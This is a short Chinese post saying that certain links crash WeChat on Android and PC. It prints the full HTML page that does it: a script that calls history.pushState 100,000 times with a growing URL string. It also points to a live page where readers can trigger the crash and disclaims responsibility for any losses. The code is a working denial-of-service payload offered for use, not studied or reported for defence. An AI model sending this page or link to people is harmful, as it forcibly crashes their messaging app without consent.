安卓微信和pc微信,有一个小bug,打开一些链接,就强制退出。iOS体验不了这个bug。
网页链接代码:
<html>
<body>
<script>
var total = " ";
for (var i = 0; i < 100000; i++)
{
total = total + i.toString();
history.pushState(0,0,total);
}
</script>
</body>
</html>
如果有想体验的可以访问:http://zsxwz.tw/bug/
如有造成什么损失,自行负责。
